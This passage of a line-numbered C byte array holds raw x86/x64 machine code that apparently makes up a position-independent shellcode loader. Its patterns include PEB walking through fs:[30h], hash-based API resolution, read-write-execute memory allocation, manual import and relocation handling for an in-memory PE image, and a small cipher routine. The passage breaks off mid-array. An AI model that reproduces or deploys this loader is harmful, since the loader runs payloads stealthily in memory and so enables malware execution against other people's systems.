385 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50,
386 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x83, 0xa4, 0x24, 0x80, 0x00,
387 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x8d, 0x84, 0x24, 0x84,
388 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x83, 0x64, 0x24, 0x44,
389 0x00, 0x8d, 0x54, 0x24, 0x5c, 0x52, 0x33, 0xc0, 0x8d, 0x74, 0x24, 0x40,
390 0x40, 0x66, 0x89, 0x44, 0x24, 0x40, 0x8b, 0x07, 0x55, 0x83, 0xec, 0x10,
391 0x8b, 0xfc, 0x8b, 0x08, 0x50, 0xa5, 0xa5, 0xa5, 0xa5, 0xff, 0x91, 0x94,
392 0x00, 0x00, 0x00, 0x85, 0xed, 0x0f, 0x84, 0x32, 0x01, 0x00, 0x00, 0xff,
393 0x74, 0x24, 0x34, 0xff, 0x53, 0x64, 0x55, 0xff, 0x53, 0x64, 0xe9, 0x22,
394 0x01, 0x00, 0x00, 0x21, 0x2f, 0xe9, 0x1b, 0x01, 0x00, 0x00, 0x8d, 0x86,
395 0x04, 0x04, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0xe8, 0x89, 0x6c,
396 0x24, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x06, 0x01, 0x00, 0x00, 0x8d, 0x86,
397 0x04, 0x06, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x89, 0x44, 0x24, 0x1c,
398 0x85, 0xc0, 0x0f, 0x84, 0xe9, 0x00, 0x00, 0x00, 0x8b, 0x8c, 0x24, 0x84,
399 0x00, 0x00, 0x00, 0x8b, 0x51, 0x14, 0x8d, 0x41, 0x18, 0x50, 0x55, 0x52,
400 0x8b, 0x0a, 0x89, 0x44, 0x24, 0x34, 0xff, 0x51, 0x44, 0x8b, 0xf8, 0x85,
401 0xff, 0x0f, 0x88, 0xbe, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x04, 0x08, 0x00,
402 0x00, 0x33, 0xed, 0x85, 0xc0, 0x74, 0x6e, 0x50, 0x55, 0x6a, 0x0c, 0xff,
403 0x53, 0x5c, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x61, 0x83, 0xa4, 0x24, 0x80,
404 0x00, 0x00, 0x00, 0x00, 0x83, 0xbe, 0x04, 0x08, 0x00, 0x00, 0x00, 0x76,
405 0x50, 0x33, 0xc0, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00, 0x03,
406 0xc6, 0x50, 0xff, 0x53, 0x70, 0x6a, 0x08, 0x89, 0x44, 0x24, 0x58, 0x58,
407 0x66, 0x89, 0x44, 0x24, 0x4c, 0x8d, 0x44, 0x24, 0x4c, 0x50, 0x8d, 0x84,
408 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x8b, 0xf8,
409 0x85, 0xff, 0x79, 0x06, 0x55, 0xff, 0x53, 0x64, 0x33, 0xed, 0x8b, 0x84,
410 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00,
411 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xb2, 0x85, 0xff, 0x78,
412 0x3c, 0x8b, 0x44, 0x24, 0x28, 0x8d, 0x54, 0x24, 0x6c, 0x52, 0x55, 0x83,
413 0xec, 0x10, 0x8d, 0x74, 0x24, 0x54, 0x8b, 0x00, 0x8b, 0xfc, 0x6a, 0x00,
414 0x8b, 0x08, 0xa5, 0x68, 0x18, 0x01, 0x00, 0x00, 0xa5, 0xa5, 0xa5, 0x8b,
415 0x74, 0x24, 0x3c, 0x56, 0x50, 0xff, 0x91, 0xe4, 0x00, 0x00, 0x00, 0x85,
416 0xed, 0x74, 0x04, 0x55, 0xff, 0x53, 0x64, 0x8b, 0x6c, 0x24, 0x18, 0xeb,
417 0x08, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x74, 0x24, 0x1c, 0x56, 0xff, 0x53,
418 0x74, 0x55, 0xff, 0x53, 0x74, 0x33, 0xc0, 0x40, 0x5f, 0x5e, 0x5d, 0x5b,
419 0x83, 0xc4, 0x6c, 0xc3, 0x81, 0xec, 0xdc, 0x00, 0x00, 0x00, 0xb8, 0x01,
420 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x31, 0xc0, 0x48, 0x79, 0x53,
421 0x55, 0x8b, 0xac, 0x24, 0xe8, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x4c,
422 0x89, 0x44, 0x24, 0x54, 0x89, 0x44, 0x24, 0x5c, 0x83, 0xbd, 0x0c, 0x05,
423 0x00, 0x00, 0x01, 0x89, 0x44, 0x24, 0x64, 0x89, 0x44, 0x24, 0x6c, 0x89,
424 0x84, 0x24, 0xa8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xc0, 0x00, 0x00,
425 0x00, 0x89, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd0,
426 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8d, 0x85,
427 0x48, 0x07, 0x00, 0x00, 0x57, 0xc7, 0x44, 0x24, 0x30, 0x1b, 0x8b, 0x44,
428 0x24, 0xc7, 0x44, 0x24, 0x34, 0x04, 0x8b, 0x4c, 0x24, 0xc7, 0x44, 0x24,
429 0x38, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x44, 0x24, 0x3c, 0x0c, 0x52, 0x81,
430 0xc2, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24,
431 0x44, 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x44, 0x24, 0x48, 0xf4, 0xff, 0xd0,
432 0xc3, 0xc7, 0x44, 0x24, 0x4c, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x44, 0x24,
433 0x54, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x5c, 0x89, 0x9c, 0x24,
434 0x38, 0xc7, 0x44, 0x24, 0x64, 0x89, 0xbc, 0x24, 0x20, 0xc7, 0x44, 0x24,
435 0x6c, 0x89, 0xb4, 0x24, 0x28, 0xc7, 0x44, 0x24, 0x74, 0x89, 0xe6, 0x48,
436 0x89, 0xc7, 0x44, 0x24, 0x78, 0xcf, 0xb8, 0x00, 0x02, 0xc7, 0x44, 0x24,
437 0x7c, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00,
438 0xc1, 0x48, 0x8d, 0x14, 0xc7, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x01,
439 0x4c, 0x8d, 0x04, 0xc7, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x02, 0x4d,
440 0x8d, 0x0c, 0xc7, 0x84, 0x24, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x8d,
441 0x1c, 0xc7, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x01, 0x48, 0x89, 0x9c,
442 0xc7, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x24, 0x00, 0x01, 0x00, 0xc7,
443 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x84,
444 0x24, 0x9c, 0x00, 0x00, 0x00, 0x48, 0x89, 0x9c, 0x24, 0xc7, 0x84, 0x24,
445 0xa0, 0x00, 0x00, 0x00, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x84, 0x24, 0xa4,
446 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x84, 0x24, 0xa8, 0x00,
447 0x00, 0x00, 0x89, 0x9c, 0x24, 0x10, 0xc7, 0x84, 0x24, 0xb0, 0x00, 0x00,
448 0x00, 0x01, 0xc3, 0x48, 0x89, 0xc7, 0x84, 0x24, 0xb4, 0x00, 0x00, 0x00,
449 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00, 0x00,
450 0x00, 0xff, 0xd7, 0xc7, 0x84, 0x24, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89,
451 0xf4, 0x48, 0xc7, 0x84, 0x24, 0xc0, 0x00, 0x00, 0x00, 0x8b, 0xb4, 0x24,
452 0x28, 0xc7, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x8b, 0xbc, 0x24, 0x20,
453 0xc7, 0x84, 0x24, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x9c, 0x24, 0x38, 0xc7,
454 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8b, 0xac, 0x24, 0x30, 0xc7, 0x84,
455 0x24, 0xe0, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x48, 0x01, 0xc7, 0x84, 0x24,
456 0xe4, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc3, 0x00, 0x89, 0x44, 0x24, 0x14,
457 0x74, 0x06, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x14, 0x8b, 0xb8, 0x54, 0x19,
458 0x00, 0x00, 0x05, 0x18, 0x19, 0x00, 0x00, 0x03, 0xf8, 0x89, 0x44, 0x24,
459 0x10, 0x33, 0xdb, 0x89, 0x7c, 0x24, 0x18, 0x53, 0xff, 0x55, 0x38, 0x66,
460 0x8b, 0x4f, 0x04, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x50, 0x3c, 0x66, 0x3b,
461 0x4c, 0x02, 0x04, 0x0f, 0x85, 0x80, 0x02, 0x00, 0x00, 0x56, 0x6a, 0x40,
462 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, 0x10, 0x00, 0x00, 0x50, 0x89,
463 0x44, 0x24, 0x28, 0x8b, 0x47, 0x50, 0x03, 0xc1, 0x50, 0x53, 0xff, 0x55,
464 0x3c, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0x59, 0x02, 0x00, 0x00, 0x0f,
465 0xb7, 0x5f, 0x14, 0x33, 0xc0, 0x83, 0x64, 0x24, 0x10, 0x00, 0x83, 0xc3,
466 0x2c, 0x66, 0x3b, 0x47, 0x06, 0x73, 0x37, 0x8b, 0x6c, 0x24, 0x14, 0x03,
467 0xdf, 0xff, 0x73, 0xfc, 0x8b, 0x03, 0x03, 0xc5, 0x50, 0x8b, 0x43, 0xf8,
468 0x03, 0xc6, 0x50, 0xe8, 0xa1, 0x07, 0x00, 0x00, 0x8b, 0x4c, 0x24, 0x1c,
469 0x8d, 0x5b, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x83, 0xc4, 0x0c, 0x41, 0x89,
470 0x4c, 0x24, 0x10, 0x3b, 0xc8, 0x72, 0xd6, 0x8b, 0xac, 0x24, 0xf0, 0x00,
471 0x00, 0x00, 0x8b, 0x9f, 0x80, 0x00, 0x00, 0x00, 0x03, 0xde, 0x89, 0x5c,
472 0x24, 0x14, 0x8b, 0x43, 0x0c, 0x85, 0xc0, 0x74, 0x68, 0x03, 0xc6, 0x50,
473 0xff, 0x55, 0x30, 0x8b, 0x53, 0x10, 0x89, 0x44, 0x24, 0x28, 0x03, 0xd6,
474 0x8b, 0x03, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x24, 0x89, 0x44, 0x24, 0x10,
475 0x8b, 0x08, 0x85, 0xc9, 0x74, 0x35, 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0xfa,
476 0x8b, 0x55, 0x34, 0x85, 0xc9, 0x79, 0x05, 0x0f, 0xb7, 0xc1, 0xeb, 0x05,
477 0x8d, 0x46, 0x02, 0x03, 0xc1, 0x50, 0x53, 0xff, 0xd2, 0x89, 0x07, 0x83,
478 0xc7, 0x04, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xc0, 0x04, 0x89, 0x44, 0x24,
479 0x10, 0x8b, 0x08, 0x85, 0xc9, 0x75, 0xd5, 0x8b, 0x5c, 0x24, 0x14, 0x8b,
480 0x43, 0x20, 0x83, 0xc3, 0x14, 0x89, 0x5c, 0x24, 0x14, 0x85, 0xc0, 0x75,
481 0x9c, 0x8b, 0x7c, 0x24, 0x1c, 0x8b, 0x9f, 0xa0, 0x00, 0x00, 0x00, 0x8b,
482 0xc6, 0x2b, 0x47, 0x34, 0x03, 0xde, 0x33, 0xc9, 0x89, 0x44, 0x24, 0x1c,
483 0x39, 0x0b, 0x74, 0x64, 0x8d, 0x4b, 0x08, 0xeb, 0x49, 0x0f, 0xb7, 0x01,
484 0x8b, 0xd0, 0x25, 0x00, 0xf0, 0x00, 0x00, 0x89, 0x54, 0x24, 0x10, 0x66,
485 0x3b, 0x44, 0x24, 0x20, 0x75, 0x23, 0x8b, 0xc2, 0x25, 0xff, 0x0f, 0x00,
486 0x00, 0x89, 0x44, 0x24, 0x10, 0x03, 0x03, 0x8b, 0x0c, 0x30, 0x03, 0x4c,
487 0x24, 0x1c, 0x8b, 0x44, 0x24, 0x10, 0x03, 0x03, 0x89, 0x0c, 0x30, 0x8b,
488 0x4c, 0x24, 0x14, 0xeb, 0x0e, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x66, 0x3b,
489 0xd0, 0x0f, 0x83, 0x25, 0x01, 0x00, 0x00, 0x83, 0xc1, 0x02, 0x8b, 0x43,
490 0x04, 0x03, 0xc3, 0x89, 0x4c, 0x24, 0x14, 0x3b, 0xc8, 0x75, 0xaa, 0x83,
491 0x39, 0x00, 0x8b, 0xd9, 0x75, 0x9e, 0x33, 0xc9, 0x8b, 0x5c, 0x24, 0x18,
492 0x83, 0x3b, 0x03, 0x0f, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x8d, 0x93, 0x04,
493 0x06, 0x00, 0x00, 0x66, 0x39, 0x0a, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00,
494 0x8b, 0x4f, 0x78, 0x85, 0xc9, 0x0f, 0x84, 0xe5, 0x00, 0x00, 0x00, 0x8b,
495 0x7c, 0x31, 0x18, 0x85, 0xff, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00, 0x8b,
496 0x44, 0x31, 0x1c, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x31,
497 0x20, 0x8b, 0x4c, 0x31, 0x24, 0x03, 0xc6, 0x03, 0xce, 0x89, 0x4c, 0x24,
498 0x20, 0x8d, 0x04, 0xb8, 0x83, 0xc0, 0xfc, 0x89, 0x44, 0x24, 0x18, 0x8b,
499 0x00, 0x52, 0x03, 0xc6, 0x50, 0xe8, 0xd8, 0x03, 0x00, 0x00, 0x59, 0x59,
500 0x85, 0xc0, 0x74, 0x1c, 0x8b, 0x44, 0x24, 0x18, 0x83, 0xe8, 0x04, 0x89,
501 0x44, 0x24, 0x18, 0x83, 0xef, 0x01, 0x0f, 0x84, 0x90, 0x00, 0x00, 0x00,
502 0x8d, 0x93, 0x04, 0x06, 0x00, 0x00, 0xeb, 0xd3, 0x8b, 0x44, 0x24, 0x20,
503 0x8b, 0x4c, 0x24, 0x1c, 0x0f, 0xb7, 0x44, 0x78, 0xfe, 0x8b, 0x04, 0x81,
504 0x03, 0xc6, 0x89, 0x44, 0x24, 0x20, 0x74, 0x70, 0x6a, 0x40, 0xb8, 0x00,
505 0x30, 0x00, 0x00, 0x50, 0x68, 0xbc, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x50,
506 0xff, 0x55, 0x3c, 0x8b, 0xf8, 0x85, 0xff, 0x74, 0x57, 0x68, 0xbc, 0x00,
507 0x00, 0x00, 0x8d, 0x44, 0x24, 0x34, 0x50, 0x57, 0xe8, 0xc8, 0x05, 0x00,
508 0x00, 0x8d, 0x83, 0x08, 0x08, 0x00, 0x00, 0x50, 0xff, 0xb3, 0x04, 0x08,
509 0x00, 0x00, 0xff, 0x74, 0x24, 0x34, 0xff, 0xd7, 0x68, 0xbc, 0x00, 0x00,
510 0x00, 0x33, 0xdb, 0x53, 0x57, 0xe8, 0xcb, 0x05, 0x00, 0x00, 0x83, 0xc4,
511 0x24, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x53, 0x57, 0xff, 0x55, 0x40, 0xeb,
512 0x17, 0x8b, 0x47, 0x28, 0x51, 0x6a, 0x01, 0xff, 0x74, 0x24, 0x34, 0x03,
513 0xc6, 0xff, 0xd0, 0xeb, 0x07, 0x8b, 0x47, 0x28, 0x03, 0xc6, 0xff, 0xd0,
514 0x68, 0x00, 0xc0, 0x00, 0x00, 0x33, 0xc0, 0x50, 0x56, 0xff, 0x55, 0x40,
515 0x5e, 0x5f, 0x5d, 0x5b, 0x81, 0xc4, 0xdc, 0x00, 0x00, 0x00, 0xc3, 0x81,
516 0xec, 0xd8, 0x00, 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0xe0, 0x00, 0x00,
517 0x00, 0x55, 0x56, 0x57, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d,
518 0xb3, 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x36, 0x8b, 0x83, 0x40,
519 0x07, 0x00, 0x00, 0x33, 0xff, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00,
520 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0xff, 0x53, 0x3c,
521 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0x3f, 0x01, 0x00, 0x00, 0x8b, 0x8e,
522 0x10, 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x8d, 0x8e,
523 0x18, 0x19, 0x00, 0x00, 0x51, 0x57, 0x57, 0xff, 0x53, 0x50, 0x8d, 0x44,
524 0x24, 0x44, 0x89, 0x44, 0x24, 0x18, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x53,
525 0xe8, 0x4c, 0xea, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x78, 0x89, 0x44, 0x24,
526 0x2c, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x53, 0xe8, 0xfe, 0xf2, 0xff, 0xff,
527 0x83, 0xc4, 0x10, 0x89, 0x7c, 0x24, 0x20, 0x57, 0x57, 0xff, 0x93, 0xa8,
528 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xc8, 0x00, 0x00, 0x00, 0x8d,
529 0x44, 0x24, 0x10, 0x50, 0x8d, 0x83, 0x9c, 0x04, 0x00, 0x00, 0x50, 0x6a,
530 0x03, 0x57, 0x8d, 0x83, 0x7c, 0x04, 0x00, 0x00, 0x50, 0xff, 0x93, 0xac,
531 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xa4, 0x00, 0x00, 0x00, 0x8b,
532 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x8d, 0x83, 0xbc, 0x04,
533 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, 0x85, 0xc0, 0x75, 0x77,
534 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x0c, 0x85, 0xc0,
535 0x75, 0x5f, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18, 0x89, 0x4c,
536 0x24, 0x30, 0x52, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75,
537 0x48, 0x8d, 0x83, 0xcc, 0x03, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b,
538 0x4c, 0x24, 0x10, 0x8b, 0xf8, 0x6a, 0x02, 0x57, 0x51, 0x8b, 0x11, 0xff,
539 0x52, 0x20, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x33, 0xff, 0x85, 0xf6,
540 0x75, 0x23, 0x8b, 0x44, 0x24, 0x14, 0x57, 0x57, 0x57, 0x8b, 0x08, 0x57,
541 0x57, 0x57, 0x57, 0x57, 0x55, 0x50, 0xff, 0x51, 0x14, 0x85, 0xc0, 0x75,
542 0x0c, 0x8b, 0x44, 0x24, 0x10, 0x6a, 0x02, 0x50, 0x8b, 0x08, 0xff, 0x51,
543 0x14, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b,
544 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x1c, 0x8b, 0x44, 0x24,
545 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, 0x83, 0x40, 0x07, 0x00,
546 0x00, 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0x55, 0xe8,
547 0x15, 0x04, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00,
548 0x57, 0x55, 0xff, 0x53, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xd8,
549 0x00, 0x00, 0x00, 0xc3, 0x83, 0xec, 0x0c, 0x53, 0x55, 0x56, 0x8b, 0x74,
550 0x24, 0x1c, 0x57, 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d, 0xbe,
551 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x3f, 0x8b, 0x86, 0x40, 0x07,
552 0x00, 0x00, 0x33, 0xed, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8d,
553 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x56, 0x3c, 0x8b,
554 0xd8, 0x85, 0xdb, 0x0f, 0x84, 0xd1, 0x00, 0x00, 0x00, 0x8b, 0x8f, 0x10,
555 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x53, 0x6a, 0xff, 0x8d, 0x8f, 0x18,
556 0x19, 0x00, 0x00, 0x51, 0x55, 0x55, 0xff, 0x56, 0x50, 0x55, 0x55, 0xff,
557 0x96, 0xa8, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0x87, 0x00, 0x00,
558 0x00, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x8d, 0x86, 0xec, 0x04, 0x00, 0x00,
559 0x50, 0x6a, 0x01, 0x55, 0x8d, 0x86, 0xdc, 0x04, 0x00, 0x00, 0x50, 0xff,
560 0x96, 0xac, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x61, 0x8b, 0x44, 0x24,
561 0x10, 0x8d, 0x54, 0x24, 0x20, 0x52, 0x53, 0x50, 0x8b, 0x08, 0xff, 0x91,
562 0x04, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x40, 0x66, 0x39, 0x6c, 0x24,
563 0x20, 0x74, 0x39, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50,
564 0x8d, 0x86, 0xfc, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12,
565 0x85, 0xc0, 0x75, 0x20, 0x8b, 0x44, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18,
566 0x52, 0xff, 0x74, 0x24, 0x18, 0x8b, 0x08, 0x50, 0xff, 0x91, 0x8c, 0x00,
567 0x00, 0x00, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08,
568 0x8b, 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0xff, 0x96,
569 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x40, 0x07, 0x00, 0x00, 0x8d, 0x04,
570 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0x53, 0xe8, 0xf8, 0x02, 0x00,
571 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x55, 0x53, 0xff,
572 0x56, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x0c, 0xc3, 0x8b, 0x44,
573 0x24, 0x0c, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x10,
574 0x00, 0x8b, 0x44, 0x24, 0x04, 0x2b, 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44,
575 0x24, 0x04, 0x99, 0xf7, 0x7c, 0x24, 0x08, 0xc3, 0xe8, 0x00, 0x00, 0x00,
576 0x00, 0x58, 0x83, 0xe8, 0x05, 0xc3, 0x55, 0x8b, 0xec, 0x64, 0xa1, 0x30,
577 0x00, 0x00, 0x00, 0x33, 0xc9, 0x56, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c,
578 0xeb, 0x20, 0x85, 0xc9, 0x75, 0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14,
579 0xff, 0x75, 0x10, 0xff, 0x75, 0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x8c,
580 0xed, 0xff, 0xff, 0x8b, 0x36, 0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46,
581 0x18, 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x8b, 0x44,
582 0x24, 0x08, 0x56, 0x8b, 0x74, 0x24, 0x08, 0x8a, 0x16, 0x84, 0xd2, 0x74,
583 0x14, 0x8a, 0xca, 0x2b, 0xf0, 0x8a, 0xd1, 0x3a, 0x08, 0x75, 0x0a, 0x40,
584 0x8a, 0x0c, 0x06, 0x8a, 0xd1, 0x84, 0xc9, 0x75, 0xf0, 0x0f, 0xb6, 0x08,
585 0x0f, 0xb6, 0xc2, 0x2b, 0xc1, 0x5e, 0xc3, 0x83, 0xec, 0x14, 0x53, 0x8b,
586 0x5c, 0x24, 0x20, 0x33, 0xc0, 0x55, 0x8b, 0x6c, 0x24, 0x28, 0x56, 0x57,
587 0x33, 0xff, 0x89, 0x44, 0x24, 0x2c, 0x33, 0xf6, 0x89, 0x74, 0x24, 0x10,
588 0x8b, 0x4c, 0x24, 0x28, 0x8a, 0x0c, 0x08, 0x84, 0xc9, 0x74, 0x11, 0x83,
589 0xf8, 0x40, 0x74, 0x0c, 0x88, 0x4c, 0x3c, 0x14, 0x47, 0x40, 0x89, 0x44,
590 0x24, 0x2c, 0xeb, 0x57, 0x6a, 0x10, 0x58, 0x2b, 0xc7, 0x8d, 0x74, 0x24,
591 0x14, 0x50, 0x03, 0xf7, 0x6a, 0x00, 0x56, 0xe8, 0xfd, 0x01, 0x00, 0x00,
592 0x83, 0xc4, 0x0c, 0xc6, 0x06, 0x80, 0x83, 0xff, 0x0c, 0x72, 0x21, 0x55,
593 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x5e, 0x00, 0x00, 0x00, 0x6a,
594 0x10, 0x33, 0xd8, 0x33, 0xea, 0x8d, 0x44, 0x24, 0x24, 0x6a, 0x00, 0x50,
595 0xe8, 0xd4, 0x01, 0x00, 0x00, 0x83, 0xc4, 0x18, 0x8b, 0x44, 0x24, 0x2c,
596 0x8b, 0x74, 0x24, 0x10, 0xc1, 0xe0, 0x03, 0x46, 0x6a, 0x10, 0x89, 0x44,
597 0x24, 0x24, 0x5f, 0x89, 0x74, 0x24, 0x10, 0x83, 0xff, 0x10, 0x75, 0x15,
598 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x21, 0x00, 0x00, 0x00,
599 0x83, 0xc4, 0x0c, 0x33, 0xd8, 0x33, 0xea, 0x33, 0xff, 0x8b, 0x44, 0x24,
600 0x2c, 0x85, 0xf6, 0x0f, 0x84, 0x67, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x8b,
601 0xd5, 0x8b, 0xc3, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x83, 0xec, 0x10,
602 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x53, 0x55, 0x56, 0x8b,
603 0x74, 0x24, 0x20, 0x33, 0xdb, 0x57, 0x8d, 0x7c, 0x24, 0x10, 0xa5, 0xa5,
604 0xa5, 0xa5, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0x74, 0x24, 0x1c, 0x8b, 0x6c,
605 0x24, 0x18, 0x8b, 0x7c, 0x24, 0x10, 0x89, 0x4c, 0x24, 0x28, 0x8b, 0xce,
606 0xc1, 0xc8, 0x08, 0x8b, 0x74, 0x24, 0x28, 0x03, 0xc2, 0xc1, 0xce, 0x08,
607 0x33, 0xc7, 0x03, 0xf7, 0xc1, 0xc2, 0x03, 0x33, 0xf3, 0xc1, 0xc7, 0x03,
608 0x33, 0xd0, 0x89, 0x6c, 0x24, 0x28, 0x33, 0xfe, 0x8b, 0xe9, 0x43, 0x83,
609 0xfb, 0x1b, 0x72, 0xd6, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x10, 0xc3,
610 0x8b, 0x54, 0x24, 0x10, 0x83, 0xec, 0x14, 0x53, 0x8b, 0x5c, 0x24, 0x24,
611 0x85, 0xd2, 0x0f, 0x84, 0xe8, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x20,
612 0x55, 0x33, 0xed, 0x45, 0x56, 0x8d, 0x48, 0x0f, 0x2b, 0xe8, 0x57, 0x89,
